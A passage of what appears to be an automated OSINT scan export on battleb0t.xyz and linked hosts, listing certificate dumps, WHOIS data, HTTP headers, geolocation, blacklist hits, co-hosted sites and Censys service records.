D5:29:D7:46:02:65:73:65:FC:F5:A7:7C:2E:6F:96:79:D8:67:A4:E6
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
af:5e:3d:7d:a9:f5:42:9c:1d:2f:03:2d:1b:0d:2f:10:cb:50:
f1:b5:52:99:81:26:41:e3:0e:8b:3f:d6:44:9c:4d:76:a0:c9:
2e:6c:74:7c:a4:74:32:5e:57:3b:4d:1a:2e:c8:ca:50:8a:41:
64:52:bd:34:33:b5:79:5d:6f:b7:40:8d:f2:19:bb:9c:7a:f4:
53:d5:b8:14:be:47:eb:83:11:3f:9b:a8:6d:e6:50:9c:00:fd:
45:a4:e9:b5:c8:1a:e6:9f:65:a0:32:31:9a:f4:eb:55:67:d1:
e8:ef:64:3e:f6:9d:83:1d:d7:4f:bc:78:a6:79:31:b0:72:dc:
bc:76:08:92:82:2c:2d:62:96:6a:ea:10:aa:8b:9f:01:37:82:
68:e8:21:18:0b:93:ec:a2:d9:e4:7d:db:8d:03:6c:29:66:26:
48:37:dc:c6:b4:07:9f:89:13:5d:3c:d0:15:d9:f0:41:fb:6f:
a6:03:d7:5c:9d:60:ab:11:be:88:8c:49:85:6b:01:3f:1f:cf:
9f:fe:17:89:e9:00:42:c3:57:e3:c8:42:f8:cd:c4:7b:bc:1f:
29:1b:d5:94:0f:7c:11:23:e1:b3:ae:8d:51:5a:7e:0b:bb:e0:
95:37:98:35:9f:61:ad:e4:68:dc:1c:77:b3:9e:f7:ce:95:dd:
52:35:dd:a6
| battleb0t.xyz |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 6 | 0 | None | MarkMonitor Inc. | Domain Name: GOOGLEUSERCONTENT.COM
Registry Domain ID: 1528918319_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2022-10-16T09:27:01Z
Creation Date: 2008-11-17T15:58:29Z
Registry Expiry Date: 2023-11-17T15:58:29Z
Registrar: MarkMonitor Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2086851750
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.GOOGLE.COM
Name Server: NS2.GOOGLE.COM
Name Server: NS3.GOOGLE.COM
Name Server: NS4.GOOGLE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
|
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000407.github.io]
https://www.openphish.com/feed.txt | 000407.github.io |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-timer: S1683860053.050131,VS0,VE21 | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 02:54:14 | HTTP Headers | No | Web Spider | 1 | 0 | 2 | 0 | None | {"content-encoding": "gzip", "transfer-encoding": "chunked", "vary": "Accept-Encoding", "server": "nginx", "connection": "keep-alive", "etag": "W/\"64217dc5-156\"", "date": "Fri, 12 May 2023 02:54:14 GMT", "content-type": "text/html"} | kekw.battleb0t.xyz |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | North Charleston, South Carolina, SC, United States, US |
| 2023-05-12 02:58:34 | SSL Certificate - Raw Data | No | Certificate Transparency | 2 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:7b:a3:67:f4:76:b8:d0:86:bd:aa:81:68:7c:78:c6:53:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 18:07:07 2022 GMT
Not After : Mar 13 18:07:06 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:f3:5c:50:fa:14:e0:3f:8b:c6:63:22:13:37:d5:
cb:b8:bd:8b:1e:a5:6b:3e:a7:72:86:59:28:5c:40:
8b:1c:f8:2f:50:4b:f5:ef:0d:c5:e9:de:f9:20:da:
78:1c:0d:66:f9:dc:3f:93:0b:74:ad:7f:b2:a1:7a:
56:57:3c:77:28:5a:1a:58:66:08:52:f6:b9:f7:00:
cb:6d:f6:d8:ce:be:b0:7d:24:54:62:4e:58:7b:85:
b9:a9:b7:ac:6a:8d:99:a5:06:fd:0d:b0:88:77:c4:
1e:ca:a9:28:8a:9d:40:a2:d0:47:0a:5a:ad:c2:3d:
86:b0:bc:4e:c3:7b:51:cd:65:3e:10:7e:3b:3a:f9:
c4:70:b5:67:78:ac:bb:4f:31:b9:51:1b:63:89:e0:
2e:5b:c6:8b:52:39:42:6a:aa:6d:6c:72:68:d0:4f:
7c:c9:6a:0a:9c:f8:75:aa:50:d4:8d:ce:7f:ca:28:
87:8a:b7:bc:e2:04:a3:9b:bd:0d:fe:95:0c:de:fb:
3a:e4:bd:4d:5a:d2:f2:ba:0e:54:6d:82:9a:5c:f9:
ee:f6:a3:1e:93:71:37:5f:83:bf:08:49:75:e7:cf:
fc:13:fc:3c:21:17:a8:95:ac:1a:b0:0b:09:b4:ce:
a6:d7:8e:cb:8b:5e:2f:81:f3:69:1e:af:dd:1c:d1:
d3:27
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BE:C4:2E:77:A7:91:6D:C0:9E:C0:E1:04:BD:9C:50:CA:0E:A6:9A:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:mail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 19:07:08.083 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D0:FF:78:AE:C3:62:89:90:F2:A9:F6:
CF:41:A5:B6:AB:51:6D:6E:FB:5E:D8:9D:88:9E:50:39:
26:BD:EC:AC:34:02:21:00:BC:89:FB:E2:F1:35:F7:00:
0B:4C:4C:DE:C4:12:88:E0:4F:52:7D:18:21:0D:AC:62:
BC:76:DD:A2:F8:3F:5B:1D
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 13 19:07:08.583 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:51:94:B0:CF:3C:86:38:A4:D9:80:6F:E3:
EC:3D:37:CB:B4:65:E2:35:17:5E:BA:96:76:F4:A6:90:
1D:6A:AE:4B:02:21:00:9D:89:ED:FC:FA:3F:52:5C:6A:
FF:DA:D2:C4:54:F3:CB:81:7B:1B:4B:4F:01:26:9F:C1:
04:B7:D6:CE:B9:77:B8
Signature Algorithm: sha256WithRSAEncryption
91:4e:e2:bf:36:57:41:de:a3:6f:91:fb:a2:73:ec:c8:9e:f7:
1f:0d:59:7b:c6:09:e3:fb:bf:a4:c2:8a:32:fa:c4:f6:df:3f:
aa:05:e0:24:98:16:08:84:62:26:41:b9:6f:39:f4:71:d6:ee:
5c:b1:36:f4:e8:21:c1:33:ce:b6:3c:af:4d:e7:18:2f:6c:27:
6e:cd:40:66:5d:d7:bd:71:74:93:04:96:39:63:25:d2:be:99:
3b:37:81:f8:a4:eb:0b:81:a4:3b:25:e3:9f:76:85:e0:0f:1a:
92:b6:27:46:71:61:51:3a:f7:5d:72:65:00:9d:09:05:5c:de:
c1:d4:54:d5:5a:d7:d7:34:d4:2c:67:0d:f8:a4:f0:c4:3a:47:
80:3c:8b:81:06:a8:34:d6:42:45:55:c8:42:f9:cf:43:4d:ee:
bd:e9:55:d7:d8:77:a3:d9:4c:76:08:4a:3c:a8:97:42:30:c9:
07:48:ea:bf:5e:b8:93:d2:56:00:0f:04:1c:00:01:69:ac:de:
20:d1:8a:7a:88:01:7c:94:e0:3d:d3:30:5e:a9:3c:d3:38:56:
5b:30:14:08:f5:b9:a1:f9:56:6c:72:be:02:ce:ad:d8:53:46:
35:20:ba:70:c5:77:bf:fa:4e:08:fb:a6:cd:30:77:f4:dc:52:
90:b6:5b:91
| ayhu.xyz |
| 2023-05-12 03:11:24 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'format': {u'international': u'+14805058800', u'local': u'(480) 505-8800'}, u'country': {u'prefix': u'+1', u'code': u'US', u'name': u'United States'}, u'phone': u'+14805058800', u'valid': True, u'location': u'Arizona', u'carrier': u'', u'type': u'unknown'} | +14805058800 |
| 2023-05-12 03:29:46 | Blacklisted IP Address | Yes | UCEPROTECT | 0 | 1 | 3 | 0 | None | UCEPROTECT - Level 2 (some false positives) (207.154.228.169) | 207.154.228.169 |
| 2023-05-12 02:55:21 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["46"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "X_Xss_Protection": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Content_Type_Options": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8"}, "X_Xss_Protection": ["1; mode=block"], "X_Content_Type_Options": ["nosniff"], "Vary": ["Origin"], "Server": ["Caddy"], "Content_Type": ["application/json; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"]} | 207.154.228.169 |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | North Charleston, South Carolina, 29415, United States, North America |
| 2023-05-12 02:44:13 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.com | www.battleb0t.xyz |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0101kvmt.github.io | 185.199.111.153 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Git (software) | battleb0t.github.io |
| 2023-05-12 02:44:12 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz:443 | www.battleb0t.xyz |
| 2023-05-12 02:57:22 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | kekw.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:09:31 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | cdn-185-199-111-154.github.com | 185.199.111.154 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.127): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:35:41 | Physical Location | No | ipapi.co | 1 | 0 | 3 | 0 | None | Eygelshoven, Limburg, LI, Netherlands, NL | 45.131.109.53 |
| 2023-05-12 02:47:30 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 104.21.6.166:443 | 104.21.6.166 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:23 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-19c8\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:23 GMT", "cf-ray": "7c5f60721cb70f8d-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Maxx Hotel (Net ID: 00:02:2D:37:37:61) | 50.1188, 8.6843 |
| 2023-05-12 02:44:12 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | cloudwaysapps.com | kekw.battleb0t.xyz |
| 2023-05-12 03:09:03 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.103 | 87.248.157.102 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 001328.github.io | 185.199.111.153 |
| 2023-05-12 03:04:12 | Malicious Co-Hosted Site | Yes | abuse.ch | 0 | 1 | 2 | 0 | None | abuse.ch URLhaus (Domain) [github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | github.com |
| 2023-05-12 02:53:03 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | pics.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet8FBA (Net ID: 00:01:36:5C:8F:B8) | 37.780462,-122.390564 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-64@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": 
"65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", 
"diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not 
Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": 
"cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": 
false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 03:00:25 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-64@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": 